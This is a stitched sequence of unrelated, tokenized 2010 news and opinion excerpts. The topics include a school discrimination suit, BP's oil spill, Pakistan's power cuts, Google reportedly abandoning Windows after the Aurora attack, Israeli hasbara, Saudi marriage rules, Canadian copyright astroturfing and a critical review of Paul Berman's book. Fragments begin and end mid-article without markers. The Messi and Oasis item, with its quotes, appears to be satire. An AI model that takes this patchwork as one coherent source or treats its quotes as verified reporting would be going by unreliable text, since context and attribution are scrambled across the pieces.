The school , despite being a private religiously affiliated institution , is not exempt from federal discrimination laws , Gay said .
" The school is still covered by federal law , in part because they have more than 15 employees , " he said .
" The courts have constantly rejected arguments when such schools say its ' free exercise ' and cite the First Amendment .
It 's different for church employment , but this teacher was performing essentially secular duties . "
The lawsuit requests damages equal to lost wages for the remaining months of the 2009 school year , the 2010 academic year she expected to work and , because the disclosure of personal information caused her suffer , " emotional and mental distress , anguish , humiliation , embarrassment and anxiety . "
Hamilton declined to speak directly to ABCNews.com .
No court date has been set , but the administration said it 's not courtroom " testimony " they are concerned about .
" We request , " the school closed its letter , " that Jarretta withdraw her complaint and consider the testimony of the Lord . "
In announcing that BP will gradually fund a $ 20 billion escrow fund for Gulf oil - gusher victims , President Obama said something odd : “ BP is a strong and viable company and it is in all our interests that it remains so . ”
The president has no particular insight on whether BP , a private company , is “ strong and viable . ”
BP appears to have made a spectacularly fatal error in what was supposed to be its core competency : technological prowess in extracting ever - harder - to - get oil .
Eleven people have died , and a delicate ecosystem and priceless piece of our national and natural heritage is under grave threat .
Only time will tell whether BP can shoulder the costs that stem from its actions or inactions — $ 20 billion is just a random number — and whether governments around the world will allow BP anywhere near critical habitats again .
Furthermore , it ’s no more in our national interest that BP survive than it was for companies such as Citigroup , AIG , Lehman Brothers , Bear Stearns , and Enron to survive as corporate entities .
Companies succeed and fail .
Shareholders win or lose .
Creditors are made whole or they ’re not , out of whatever financial resources are available .
In fact , if it turns out BP can’t regain the sustained confidence of investors , it ’s very much in our national interest that markets render that verdict uncontaminated by government interference that goes beyond time - tested legal channels , whether it ’s to defend BP or to bully it .
Just as we do n’t want failed banks handing out mortgages , we do n’t want a failed oil company bumbling about trying to get petroleum out of the seabed .
If BP were to fail , unaided by any government , another company could find , produce , and sell the oil — preferably a company better at it .
On Tuesday , executives from BP ’s competitors explained in detail what they would have done differently to prevent the disaster .
These competitors would scoop up its best assets and people if the firm went under .
It happens every day in a free - market economy .
And the signal that the firm ’s failure would send to markets would do much to “ price ” oil more accurately , something that proponents of a carbon tax or cap - and - trade regime , including the president , say they want to do .
Investors could determine from BP ’s demise that extracting oil can be a far riskier and costlier venture than they had thought , and they would demand higher returns accordingly .
Oil , viewed as scarcer and more valuable , would cost more .
As for the disaster ’s victims , BP must of course compensate them to the extent that it can .
But if it can’t , it would be terrible public policy to try to prop up a zombie company with political words of confidence — and maybe money from the British government , which has a strong political interest in keeping BP in business — so that the firm could earn enough money to repay Gulf Coast residents , workers , and local governments .
If BP ca n’t pay up , it becomes a social and moral question of how much taxpayers should offer to help their fellow citizens ( considering that bad regulators , too , likely contributed to this catastrophe ) .
That ’s a question to be asked and answered through the democratic process , not wished away by pretending that BP is “ strong and viable , ” even if it ’s not .
LAHORE , Pakistan —
The Taliban may be plotting bombings , and the economy is on the brink .
But these days , the single biggest woe tormenting Pakistanis is as basic as an electric light bulb .
Pakistan is in the throes of an energy crisis , with Pakistanis now enduring about 12 hours of power cuts a day , a grueling schedule that is melting ice , stopping fans and enraging an already exhausted populace just as the blast furnace of summer gets started .
In an effort to stem that frustration , Pakistan ’s government held an emergency meeting last week , bringing together top bureaucrats from across the country .
But instead of easing the problem , it aggravated it , ordering power - saving measures that seemed calculated to smother some Pakistanis ’ last remaining pleasures .
“ They are playing a joke on us , ” said Amina Ali , the mother of a bride at a wedding hall that was under orders to close early as part of the new energy - saving restrictions .
Her brother chimed in : “ The Pakistani people are a toy in the hands of the government . ”
Ever think that you could make a flick craptacular enough to light up the Syfy Channel ?
Starting Friday , they 're letting online users collectively create a movie , from concept to the next Dinoshark .
Advertisement
Syfy is partnering with IGN.com to launch B Movie Mogul , which will serve as a clearinghouse of ideas , allowing users to vote on everything from the genre — either 2010 apocalypse flick , Bermuda Triangle monster movie , or Roswell - set alien picture — to costumes , dialogue , and casting .
The results will be shot and aired next year as a Syfy original movie .
Crowdsourcing creativity seems like a recipe for disaster .
But judging by some of the flicks that end up on Syfy , perhaps disaster 's the most popular item on the menu .
Advertisement
( Via Hollywood Reporter )
The Financial Times reported last night that Google was going to phase out internal use of Microsoft Windows due to security concerns .
The migration away from Windows is reported to have started in January , motivated by the Chinese Aurora attacks on the company that exploited a flaw in Internet Explorer 6 .
In the story , the FT said that new Google employees would be given the choice between systems using Mac OS X and Linux .
Windows machines will only be available with CIO approval .
This would put an end to the existing policy , whereby employees were generally free to pick the platform that they preferred .
Google has refused to comment .
This seems surprisingly extreme , given that there are practical reasons for Google employees to use Windows .
The company produces Windows software , such as the Chrome Web browser and Google Desktop Search .
The company also has a great many Web properties , all of which need testing on Windows .
As such , Windows is sure to remain a part of the Google ecosystem , at least for anyone involved in end - user facing applications .
It 's just too important to ignore .
In the aftermath of the Google hack , even Microsoft said that people should stop using Internet Explorer 6 , as it lacks the defence - in - depth measures found in Internet Explorer 8 when used on Windows Vista and Windows 7 .
But switching to the latest version of Windows , and ditching a browser that should be left behind , is a far cry from leaving Windows altogether .
There are certainly reasons why Google might want to do so : Microsoft is in competition with Google , and so every user that Google can get off of Windows and Office is a net win for the advertising giant .
But to do so as a response to the Aurora hacks ?
That does n't make a lot of sense .
The IT industry does n't always like to admit it , but the truth is , Windows ' security is actually pretty good .
I know , I know .
Windows machines are routinely hacked , there are huge botnets of machines running Windows , viruses are rampant , and so on .
This is true .
But I would argue that it 's not actually relevant in this case .
The Google attack was not your common - or - garden indiscriminate mass attack , intended to snaffle credit card numbers and banking passwords , and send millions of spam e-mails .
These attacks are common , but in general depend on exploitation of patched vulnerabilities .
They 're aimed at the low - hanging fruit : the ( admittedly abundant ) people who have n't updated their software for years .
Who have no malware protection installed .
Who will click on anything and , well , everything .
Windows , with its dominant market share , is certainly susceptible to such attacks .
These broad - based attacks are financially motivated , with the goal being to collect as many sets of personal data or recruit as many zombies as possible .
As such , it 's not a surprise that attackers are aiming at the platform with the most users .
They get more money that way .
For a user uninterested in keeping their system up - to - date , Mac OS X or Linux would certainly provide an advantage of sorts against this kind of attack .
It might not be the most robust protection possible , but absent any drastic growth in Mac OS X or Linux market share , it 's likely to be effective nonetheless .
The Google attack , however , was not this kind of attack .
It was a targeted attack that was aimed specifically at certain companies .
On top of this , it used a previously undisclosed ( and hence unpatched ) vulnerability in Internet Explorer 6 .
Use of undisclosed vulnerabilities is not unheard of , but it 's relatively unusual .
There is a black market for undiscovered flaws , but they are expensive to buy ( nobody really knows for sure , but figures of $ 100,000 per exploit have been claimed ) , and for widespread scattergun attacks , there 's just not much point .
Unpatched systems are sufficiently abundant that it 's likely to be much more cost - effective to simply use vendor security bulletins and patches as the source of flaws .
Attackers using non-public flaws gain several advantages .
Most obviously , their victims will always be vulnerable ( no need to hope that they 've not patched their systems ) .
Also important is the fact that typical anti-malware measures — anti-virus software , anti-rootkit software , intrusion detection systems , etc. — wo n't generally detect such attacks .
The decision to specifically target particular companies also makes it easier for the attackers to encourage a victim to visit a malicious webpage ( or read a malicious PDF , open a malicious e-mail , etc. ) .
It 's easy to dismiss e-mails that are obviously fraudulent — e - mails telling you about the iTunes purchases you have n't made , the Fedex deliveries that you have n't ordered — but when an e-mail arrives with your name , or address , or other personal information , it 's a lot harder to ignore .
It 's these properties that make the Google attack unusual , and it's these properties that make switching platforms ineffective .
Worse than ineffective : if this is the kind of threat that Google is concerned with , Windows 7 is one of the safer operating systems to use .
The thing about targeted attacks is that the relative obscurity that might provide some semblance of protection to normal , everyday users stops working .
If a hacker wants to break into a specific organization , then that hacker will exploit the specific software that 's used by that organization .
That more people outside the target organization use Windows becomes irrelevant in this scenario .
So the question of which OS to use changes — it 's no longer " Which OS is less likely to be attacked ? " but rather " Which software is less likely to be exploitable ? " and " Which OS will protect me best in the event that I am attacked ? "
With regard to the former , there 's no especially good solution .
All Web browsers have exploitable flaws , and this is a persistent and recurring problem .
Internet Explorer 6 let Google down , but as the recent pwn2own competition showed , Internet Explorer 8 , Firefox 3.5 , and Safari 4 were all exploitable .
Google 's own Chrome was n't exploited , but whether this represents genuine immunity is not clear .
The flaw used to exploit Safari was in the WebKit rendering engine — which is also used by Chrome .
Chrome mitigates the impact of such flaws through its use of sandboxing , and its success in pwn2own has been widely attributed to that sandboxing .
Internet Explorer 8 also uses sandboxing — however , breaking out of the sandbox was n't necessary to win pwn2own .
Of course , in a targeted attack , the vector does n't have to be a browser anyway .
Just some application that you know the victim will use .
Browsers are a good choice , because they 're so widely used , but the Google attackers could have gone after Office or Adobe Reader , say , if they 'd wanted to .
And this is where the OS comes into play .
Windows has a range of features designed to make software exploits harder to pull off even in the event of bug in a program .
These features are not insurmountable , but they nonetheless serve as a hindrance to attackers .
Microsoft has also invested heavily in development methodologies that attempt to systematically reduce the number of security defects that occur , and reduce the impact of those defects that are left .
Though not perfect , these methods do yield results for Redmond , with researchers saying that Windows ' code auditing is better than Apple's .
The net result is that fully - patched Windows 7 machines , especially running 64 - bit software , represent a tough nut to crack for attackers .
Assuming Google 's system administrators are competent , modern versions of Windows would provide decent — not impenetrable , but good nonetheless — protection against precisely the kind of attack that Google is apparently striving to guard against .
So banning Windows for security reasons makes no sense .
Linux does n't have the same organized development process as Microsoft — that 's just the nature of a decentralized open source development effort .
It does , however , have a range of complex and powerful security capabilities , if you elect to use them .
The result is that by default Linux may be a bit easier to attack than Windows ; conversely , it can also be made harder to attack .
If Google wants to avoid another Aurora , Linux , too , could be a good choice .
Where things get a bit weird , however , is Google 's alleged decision that Mac OS X is a good alternative .
Though Apple likes to trumpet the security of its platform , the reality is quite different .
Mac OS
X is easy , even fun to exploit .
Safari , too , is " easy pickings " for hackers .
Even when Mac OS X does implement exploit mitigation techniques , these implementations are often weak or flawed .
Apple also lacks an equivalent to Microsoft 's secure development methodologies , an omission criticized by security researchers .
Apple is beginning to take security more seriously , but it still lags behind other vendors .
The result of all this is that any hacker wanting to attack a company that uses Mac OS X is going to have an easier job than if they were attacking a company that uses Windows 7 .
Depending on the distribution and configuration , Linux too may represent a softer target than Redmond 's offerings .
Mac OS X and Linux would certainly leave the company less exposed to the bulk , non-specific attacks ( though keeping systems patched and filtering e-mail already handles that problem pretty effectively ) , but as a defense against the next Aurora - like attack , the decision is a very strange one indeed .
One of the most striking trends following the flotilla attack has been how quickly Israeli hasbara has been exposed and discredited by internet journalists .
Robert Mackey has a post on the Times Lede blog highlighting some examples today – Max Blumenthal ’s reporting on the doctored IDF audio of the attack and Noam Sheizaf ’s work on Turkish photos of the Mavi Marmara attack which contradict IDF claims .
To these two I would add Lia Tarachansky and Blumenthal ’s work disproving the IDF ’s claim that the flotilla was linked to Al Qaeda , Jared Malsin ’s work confirming the doctored audio , and Ali Abunimah , who has been in the lead on many of these stories and lately has been reconstructuing the path of the Mavi Marmara to show it was actually fleeing at the time of the Israeli attack .
All of this has appeared on the internet and are helping to shape the story , despite the Israeli Foreign Ministry ’s best efforts .
These efforts are helping to fill a crucial void around the narrative of the attack , as Israel still refuses to share the entirety of the video and still footage it confiscated from flotilla passengers .
Israel has released snippets of the footage which they believe support their version of events , apparently believing that by limiting access to the footage they could control the story .
This has clearly not been the case .
Instead they are on the defensive , busy issuing clarifications and apologies .
The one " success " in their hasbara effort has been the racist " we are the world " knock off which really only confirms how absolutely tone deaf many Israelis are right now to feelings around the world .
The fact that this embarrassment is viewed as a success in Israeli circles has been termed " Hasbara Derangement Syndrome " by Israeli blogger Didi Remez .
They ended up having to apologize for that one as well even though Israeli spokesperson Mark Regev " thought it was funny . "
It seems that Israeli hasbara is getting a bit tougher in the age of the internet .
I mean , who ’s going to believe " a land without people , for a people without a land " when there are ten YouTube videos to prove you wrong ?
The angry speech made by Obama this afternoon on the Gulf oil spill marks a turning point in the Governments relationship with the oil industry .
Obama lashed out at the ' ridiculous spectacle ' of Oil executives passing the buck on responsibility for the disaster and called for ' top to bottom reform of the mineral managements service ' .
The agency will be divided so that inspection and safety department will be independent of the part that collects royalties and hands out permits so that there will be ' no conflicts of interest , real or perceived ' .
Despite the awful mess , this marks a huge opportunity for the Federal government to regulate the industry and hopefully prevent disasters of this scale from happening again :
Toy balloons released by kindergarten children sparked a security alert in South Korea amid growing military tensions with North Korea , the defence ministry said today .
Troops and police mobilised a special task force early yesterday after a resident of Ansan , 35 km southwest of Seoul , reported that 40 to 50 flying objects resembling parachutes fell on a mountain the previous night .
They turned out to be balloons from a nearby kindergarten , a ministry spokesperson said .
An explosion on June 7 on Yeonpyeong Island , near the sea border with North Korea , along with the discovery of a diving suit on the island ’s shoreline , also sparked an alert .
A joint military and police investigation found that the diving suit was abandoned by a fisherman and the explosion was not suspicious .
State inspectors strongly criticised military chiefs for their inadequate response to the sinking of a warship near the disputed sea border on March 26 , with the loss of 46 lives .
The inspectors recommended that 13 generals , 10 lower - level officers and two civilian defence ministry officials be punished .
The country ’s top military officer Lee Sang - Eui offered his resignation .
South Korea announced reprisals against North Korea after a separate multinational investigation concluded that a submarine from the North had torpedoed the warship .
Image caption
The new measures have been welcomed by human rights activists
Saudi Arabia has started issuing new marriage contracts that require the age of the bride to be given , in an attempt to stop underage girls from marrying .
The kingdom had promised new measures after a series of high - profile cases involving young brides .
Human rights groups have welcomed the new measures , saying clear - cut rules were needed to ensure underage girls were not harmed .
Saudi Arabia has no law against child marriage .
" There is a serious drive by the [ justice ] ministry to determine an age for girls to marry following the recent reporting of older men marrying young girls , " an official told the Saudi - based Arab News newspaper .
Dowry
The National Society for Human Rights welcomed the new measures .
" The marriage of underage girls has been in the limelight for the past three years , " said NSHR chairman Mufleh Al - Qahtani .
" A number of lawsuits have also been filed to stop fathers marrying off their underage girls to older men . "
In February a 12 - year - old girl decided to stay married to an 80 - year - old man , after initially filing for divorce .
A $ 22,600 ( £ 14,174 ) dowry had been paid to her father just months before .
In 2008 , the case of an eight - year - old girl who was married to a 50 - year - old man was revealed when the child 's mother tried to annul the marriage .
Defenders of child marriage say the practice is part of Saudi culture .
Robert Reich says the feds need to take over :
It 's time for the federal government to put BP under temporary receivership , which gives the government authority to take over BP 's operations in the Gulf of Mexico until the gusher is stopped .
This is the only way the public will know what 's going on , be confident enough resources are being put to stopping the gusher , ensure BP 's strategy is correct , know the government has enough clout to force BP to use a different one if necessary , and be sure the president is ultimately in charge .
If the government can take over giant global insurer AIG and the auto giant General Motors and replace their CEOs , in order to keep them financially solvent , it should be able to put BP 's north American operations into temporary receivership in order to stop one of the worst environmental disasters in U.S. history .
The Obama administration keeps saying BP is in charge because BP has the equipment and expertise necessary to do what 's necessary .
But under temporary receivership , BP would continue to have the equipment and expertise .
The only difference : the firm would unambiguously be working in the public 's interest .
As it is now , BP continues to be responsible primarily to its shareholders , not to the American public .
As a result , the public continues to worry that a private for - profit corporation is responsible for stopping a public tragedy .
[...]
Expressing grave concerns is not enough .
The President needs legal authority to order BP to protect the United States .
The President is not legally in charge .
As long as BP is not under the direct control of the government he has no direct line of authority , and responsibility is totally confused .
For example , listen for the " we " and " they " pronouns that were used by Carol Browner in response to a question on NBC's " Meet the Press " Sunday ( emphasis added ) : " We 're now going to move into a situation where they 're going to attempt to control the oil that 's coming out , move it to a vessel , take it onshore .... We always knew that the relief well was the permanent way to close this ....
Now we move to the third option , which is to contain it .
If [ the new cap on the relief well is ] a snug fit , then there could be very , very little oil .
If they 're not able to get as snug a fit , then there could be more .
We 're going to hope for the best and prepare for the worst . "
When you get pronoun confusion like this , you can bet on confusion -- both inside the Administration and among the public .
There is no good reason why " they " are in charge of an operation of which " we " are hoping for the best and preparing for the worst .
The president should temporarily take over BP's Gulf operations .
We have a national emergency on our hands .
No president would allow a nuclear reactor owned by a private for - profit company to melt down in the United States while remaining under the direct control of that company .
The meltdown in the Gulf is the environmental equivalent .
I 'm a firm believer in the old adage that a picture is worth a thousand words .
So , on request here is the newer version of " What if you could tell everyone 's salary by the size of their head in a team picture ? " image .
These heads are actually proportional to the size of their salary , with no other mathematical adjustment .
The first thing I thought of when I saw it was grade school science class when they taught us that the sun was so big that it would fit a million Earths inside of it .
I never quite got a handle on that one until just now when I saw Soup 's melon .
I think if you click the images you get a slightly larger view .
Not sure , I 'm kinda new at this fanpost thing .
I 'll keep an eye on it to make sure it ends up showing ok .
After converting the numbers to a big , depressing visual of underperforming Macy 's parade baloons I decided that a more optimistic view was also needed , so here 's everyone 's head in proportion to their WAR .
Unless they have a 0 or negative WAR , in which case they have normal - sized heads .
And that looks more like what our team 's been performing like .
Gallardo is the runaway MVP , Cory Hart is a monster , and a whole bunch of people are expendable .
Lastly , just for the fun of it , I decided to do one more graphic as if the whole team was apples on a tree and they were green or ripe depending on their age .
Oops , the tree lost a few apples .
And there 's one red one that looks like a worm 's been eating it .
The copyright lobby , almost certainly led by the Canadian Recording Industry Association , has launched a major astroturf campaign in which it hopes to enlist company employees to register their support for Bill C - 32 and to criticize articles or comments that take issue with elements of the proposed legislation .
The effort , which even includes paid placement of headlines on Bourque.com , is still shrouded in some secrecy .
A member list , which featured many record company executives , has now disappeared from public view .
Requests to identify who is behind the site have been stonewalled thus far , with both ACTRA and AFM Canada explicitly stating they are not part of the site ( this is no surprise since most creator groups have been critical of C - 32 ) .
The heart of the site ( which requires full registration ) is a daily action item page that encourages users to " make a difference , everyday . "
Today 's list of 10 items is a mix of suggested tweets , blog comments , and newspaper article feedback .
Each items includes instructions for what should be done and quick link to the target site .
For example , users are asked to respond on Twitter to re-tweets of an op - ed by Dalhousie law professor Graham Reynolds .
The suggested response is " As an employee in entertainment , this Bill will protect your livelihood " or " The discussion around DRMs is largely fear mongering . "
Other suggested twitter activity includes twittering in support of James Moore and his comment that the Chamber of Commerce represents the best interests of consumers or to start following MPs on Twitter ( in the hope they will follow back and later see astroturfed tweets ) .
The site also encourages posting comments on a wide range of articles and interviews .
For example , users are encouraged to comment on a Torontoist article on C - 32 with the following points :
The article completely overstates the expected prevalence of DRMs
DRMs have faded quickly from the music industry - why would producers / artists hide their work ?
There are a whole list of exceptions in the Bill , none of which Michael Geist and his Bit Torrent followers acknowledge
A Calgary Herald op - ed on the concerns with C - 32 generates the following suggested response :
Artists , other content creators , and the people who invest in them deserve a law that protects their work from theft and unauthorized use on the Internet ;
Canada has become a global destination of choice for the operators of pirate websites ;
Bill C - 32 is a good first step in creating balanced copyright laws for Canada ;
There are suggested responses to audio interviews as well .
For an interview CRIA 's Graham Henderson did on CBC Radio , users are encouraged to " listen to the interview , share it with your friends on Facebook , link to it on your Twitter account and post a comment in the comment section underneath the audio file . "
As for Industry Minister Tony Clement 's interview on Search Engine , users are encouraged to post comments on the TVO site stating :
TPMs are used to help creators of digital content – books , games , movies , software and music – to protect their creations from unauthorized copying ;
TPMs also enable innovative new digital offerings that give consumers more choice in how they buy digital content ;
For about $ 10 a month , music fans can access literally millions of songs on streaming music services .
But they do n’t own the songs ;
Other fans prefer TPM - free a la carte downloads for about $ 10 an album .
Without TPMs , it simply would not be possible to offer new choices to consumers ;
The measures in Bill C - 32 , the government ’s copyright reform legislation , add a measure of legal protection against breaking “ digital locks . ”
Without these provisions , digital content would effectively lose all protection , and innovative digital offerings would disappear .
The creators of music , books , games , movies , and software – and their investors – would be left high and dry .
All of these are just today 's instructions , with new activities promised on a daily basis .
This secret astroturf effort is unlikely to fool many people , but it is worth monitoring and serves as a useful reminder that Canadians seeking fair copyright in Canada will need to ensure that their voices are heard and not drowned out by this organized , shadowy campaign .
Mozilla developer Armen Zambrano has announced the release of a downloadable pre-release version of the 64 bit edition of Firefox for Windows .
Version " 3.7a5 pre " is an early stage nightly build and has not been subjected to the usual standard of testing .
It is intended for experimental purposes only and not for live deployment .
Mozilla plans to support 64 bit processors in the forthcoming Firefox 4 .
According to a blog posting by Mozilla director Mike Beltzner , this could be available by the end of November .
A previous blog posting from Mozilla developer John O'Duinn , notes that nightly builds of the 64 bit versions for Linux and Mac OS X have been available since 9th April .
Nightly builds can be downloaded from the Mozilla FTP server .
( djwm )
Carlos Tevez and Lionel Messi have promised to offer swaggering Mancunians Noel and Liam Gallagher a blank cheque to reform Oasis , if Argentina win the World Cup this year .
Advertisement
Apparently Tev has given up trying to convince everyone to listen to the snake - hipped Latin rhythms of his own band Piola Vago , and converted Diego Maradona 's squad into hardcore Oasis fans — none more so than Lionel Messi , who 's spent the whole World Cup rocking out like it was 1994 all over again .
According to The Sun , Leo has pledged to bring the warring Gallagher brothers together again for a celebratory gig should Argentina triumph in this year 's tournament , and is willing to hand over however much coin is necessary as to make it happen .
Says Messi :
" On the plane on the way to the World Cup Carlitos made me listen to their first two albums .
I have to say I was n't expecting much but it is some of the best material I have ever heard .
They are absolutely amazing .
" Their songs are incredible .
I would have to say Supersonic and Live Forever are my favourites .
I have been listening to their stuff on my iPod dock in the hotel room , on the way to the matches and in the dressing room .
I can't believe it 's taken me all this time to finally listen to them .
" I 've been watching their live performances on YouTube and they look like they'd be amazing to see in concert .
I asked Carlitos if we could go and see them in Manchester or London in concert , but he told me they have split up .
" I showed the rest of the boys in the Argentina squad their stuff and I promise you , everybody absolutely loves it .
" We have agreed that if we win the World Cup we want to fly them over to Argentina for our celebration party .
We just need them to name their price . "
Advertisement
Should the Gallaghers oblige , it 'll come as a complete punch in the balls to Cristiano Ronaldo , who had his own request for a private gig rejected last year , even after trying to sweeten the band with free tickets to El Clasico .
This post , written by Josh Burt , is republished with permission from The Spoiler .
Go there often if you like soccer stuff .
The Flight of the Intellectuals
by Paul Berman
( Melville House , May 2010 )
Islamophobia / Islamophilia : Beyond the Politics of Enemy and Friend
Andrew Shryock , ed .
( Indiana University Press , June 2010 )
Lauded by Foreign Affairs as “ one of America ’s leading public intellectuals , ” Paul Berman was recently identified in a flattering New York Times review as “ a man who identifies ‘ with the liberal left . ’”
If Berman inhabits and projects the liberal left , then the conservative right has lost its claim to being at the forefront of Islamophobia .
The huge mistake of the Times ( and almost every outlet of mainstream media reporting ) is to assume that Berman is a public intellectual who can speak about Islam , that his is an authoritative voice to be heeded , his insights accepted and thus , perhaps most importantly , his warnings followed .
In fact , the message in Flight of the Intellectuals , Berman ’s latest polemic which hit the bookstores last month , is so insidious , his knowledge of Islam so shallow , that it must be addressed through the one major category of public discourse into which it fits : Islamophobia / Islamophilia .
Since 9/11 , the American and European publics have been assaulted by Islamophobic writing from those who know little or nothing about their subject yet claim to speak with authority .
In August , for example , I wrote a review of Christopher Caldwell ’s neoconservative lament for Europe ’s growing Muslim population , in which he warns that the “ innocent , naive , unsuspecting ”
West will find that the new wave of Muslims has “ ended a way of life , Western civilization as we know — and were once taught to love — it . ”
Caldwell ’s work , in both its tone and message , is helpful to recall in addressing this latest siren on ‘ the Islamic danger . ’
Like Caldwell , Berman is a journalist whose fast - paced , breathless prose is meant to locate him as an omniscient authority ; his innocence of Islam or knowledge about Muslims is worn as a badge of honor .
Writing in a stream of consciousness , without footnotes or source citations , he speaks as an ‘ enlightened ’ and ‘ outraged ’ partisan , not of civilization ( as did Caldwell ) , but of liberalism .
Islamophobia has already been arrayed in some of the more lucid analyses that followed the Danish cartoon crisis of 2005 – 2006 .
In Islamophobia : Making Muslims the Enemy ( Rowan & Littlefield , 2008 ) , Peter Gottschalk and Gabriel Greenberg used political cartoons to show how Muslim difference was always portrayed as exceptional ; Islam was not American , and Muslims could not fit into the American or Western way of life .
That trajectory of irreducible difference has now been challenged in Andrew Shryock ’s even more ambitious volume , Islamophobia / Islamophilia : Beyond the Politics of Enemy and Friend .
Berman ’s book , with its hidden genealogy and flawed logic , fits rather neatly into the Islamophobia / Islamophilia construction .
A veritable American strobe light of Islamophobic utterances , it stands forth as a notable specimen of Islam hatred , though that classification would be admitted neither by the author nor by most in the mainstream media .
The single most salient point here is the pervasiveness of Islam hatred or Islamophobia .
It is an ideological project and is not limited to cartoons .
It is not the purview of the political right , nor is it a Zionist conspiracy , nor an evangelical polemic .
It draws on , even as it enlarges , the specter of uncertainty about Islam and Muslims that continues to pervade the American public square and afflict many stakeholders in the American project since 9/11 ( and , in no small part , because of 9/11 ) .
Had Berman Read a Bit More Widely in al - Ghazali …
Berman ’s book begins with an epigraph from the 11th century Iraqi doyen of religious sciences , Abu Hamid al - Ghazali , arguably the most prominent premodern Muslim intellectual .
Evoking the human search for the divine as “ the quest for man ’s chiefest bliss , ” the quote sets the stage for his blistering , unrelenting excoriation of Tariq Ramadan which , as an earlier Times review put it , is “ essentially a booklong polemic against one magazine article . ”
Here ’s Berman on Ramadan from an interview with Guernica :
Despite the many different opinions in the Muslim world and a virtual civil war in the Muslim world , there ’s a fantasy among a good many people in the West to think of the Muslim world as a single place , where it has a single problem and that some messianic figure is going to rise and straighten it out .
And if you ’re looking for that great messianic figure , the Great Muslim Hope , then Ramadan seems kind of plausible if you do n’t listen to him too carefully .
He has this royal lineage .
He has a very marvelous and impressive demeanor .
He claims to speak in the name of the religion itself .
And so you can place this sort of fantastical hope on him .
Why does al - Ghazali loom so large in this effort to unmask Ramadan as the wannabe “ Great Muslim Hope ” ?
Because , in Berman ’s eyes , al - Ghazali was the William James of his age , etching the importance of religious experience on two levels : the empirical domain called ‘ this world ’ and the mystical domain broaching the world beyond senses and time .
Berman does to al - Ghazali what he does to Ramadan : invokes him , quotes him , examines him , and then skewers him .
There is no such thing as a convincing argument or a satisfying insight from either Muslim luminary .
Berman assumes that his readers will trust his judgment as an amateur intellectual , one who can read in any field without expertise or experience , whether the figure is the premodern al - Ghazali , or his latter day successor , Ramadan .
What is not disclosed in the torrent of Berman ’s ramblings , however , is his own genealogy .
It is disguised because he offers no index of themes , topics , or places — just names .
He cites two Muslim scholars whom he deems to be genuine liberals ( Abdullahi an - Na’im and Bassam Tibi ) , yet they garner only a handful of references .
Al - Ghazali himself does enjoy several pages of exposition , though they ’re exceeded by those accorded harsh critic of Islam , Ayaan Hirsi Ali , and early Islamist Yusuf al - Qaradawi ; the former is lauded , the latter berated in Berman ’s needling sarcasm .
Christopher Caldwell is the one name that we would expect to appear in the roll call , yet he never surfaces .
Since there is no bibliography , the reader is left to imagine who or what Berman read in arriving at his fulminations .
Berman does note the several French journals and books extolling Ramadan .
He even mentions the controversial critic of Islam , Daniel Pipes , but chiefly to scold him for having first praised one of Ramadan ’s books before retracting those plaudits and replacing them with broadsides .
None of the French authors , however , nor Pipes , hone in on the three figures central to Caldwell ’s — and later Berman ’s — diatribe against Islam : Sarkozy ( the catalyst ) , Ramadan ( the villain ) and Hirsi Ali ( the heroine ) .
It is Caldwell too who asks the question central to Berman ’s entire exposé :
Since Ramadan is the most broadly listened to contemporary explainer — to both Muslims and non-Muslims — of Islam ’s most troubling doctrines , it is important to figure out whether his reflections on Muslims ’ role in the West are workable and sincere .
Does he believe Muslims can be real European citizens or does he believe they will always remain somehow foreign ?
Caldwell answers the question emphatically : the otherness of Islam , the foreignness of Muslims , is irreducible , which is precisely why the ex-Muslim , now anti-Muslim Hirsi Ali is so attractive to both Caldwell and to Berman .
When an interviewer dares to challenge some of Ali ’s bona fides Berman hectors him :
Surely she ( Hirsi Ali ) is making people think .
People with backgrounds like her own .
Meanwhile we have a bunch of Western journalists running around saying , ‘ Oh , do n’t listen to her .
She is the one responsible for bringing the violence . ’
She ’s not .
She ’s the one making people think for themselves , sometimes more skillfully , sometimes less skillfully .
Ramadan is telling people , ‘ Do n’t think .
I ’ll say all the nice - sounding blather that you want to hear against bigotry , against violence , and on the other side of my mouth I ’ll tell you to revere these terrible sheiks and look to them for guidance , and finally I ’ll say we ca n’t even discuss these issues like stoning women in public . ’
It is on the issue of stoning women in public that Berman feels confident he has ‘ caught ’ Ramadan in his own verbal trap , though Berman , of course , is not the agent responsible for the snare .
“ Sarkozy caught Ramadan off guard [ on the question of stoning women in public ] , ” gloats Berman , “ and he had no time to drape a discrete and modern curtain across his salafi convictions , and his thoughts came tumbling out undisguised and naked , for all to see . ”
Yet Ramadan ’s actual statement conceals an element of Muslim juridical logic that eluded Berman as surely as the vision of al - Ghazali had eluded him earlier .
After saying that he personally did not think the law that allowed stoning should be applicable , Ramadan argued that the law could not be delegitimated for most or , preferably , all Muslims unless and until “ we arrive at a consensus among Muslims . ”
In effect , Ramadan wanted to have a debate that would show the inadequacy of this practice from an Islamic perspective in order to reach a consensus among Muslims to ban it .
What outraged first Sarkozy and then Berman is that Ramadan refused to agree with Western liberal thought and to disavow any connection to his own , or his contemporaries ’ , Muslim past .
Had Berman read a bit more widely in al - Ghazali , he might have discovered that the major Ghazalian tome , On the Boundaries of Theological Tolerance in Islam , addresses the same topic as Ramadan ; namely , the diffuse nature of authority in Islam .
Al - Ghazali argues that there is no such thing as orthodoxy or a single right view , only authority derived from consensus , which may be formal or informal .
One informal way to reach consensus is to encourage debate about critical topics , though one cannot preempt that debate by declaring its outcome in advance .
One must first invite others , no matter how divergent their outlook , to express their view on the debate topic — e.g. , stoning of women for adultery .
And so Berman , in emulation of Sarkozy , has laid his own trap and insists on making him the Muslim Anti-Hero who stands in for all contemporary Muslims .
It is a game that Muslims can never win .
Berman ’s agenda is not about ascertaining right and wrong or defending a liberal or conservative norm , but about preserving his own privileged podium as a critic who can hector other liberals , like Timothy Garton Ash or Ian Buruma , who wrote the article to which the book is a response .
Berman uses Ramadan as a surrogate to denounce all Islamic discourse and to disavow any semblance of Muslim compatibility with Western ‘ liberal ’ norms and values .
The real debate , never declared , is between Islamophobia and Islamophilia .
The Singular Islam that Must Be Evoked and then Defeated
Andrew Shryock , a cultural anthropologist specializing in religious ethnography , engages the debate about what Islam is and what it is not .
His collection of essays attempts to move beyond the dichotomization of Islam into bashers ( Islamophobes ) and admirers ( Islamophiles ) .
The goal of Islamophobia / Islamophilia , in his own words , is :
to expose the tactical ignorance , malign and benign , that suffuses educated opinion on all things Muslim .
Neither Islamophobia nor Islamophilia has cornered the market on mis/representation .
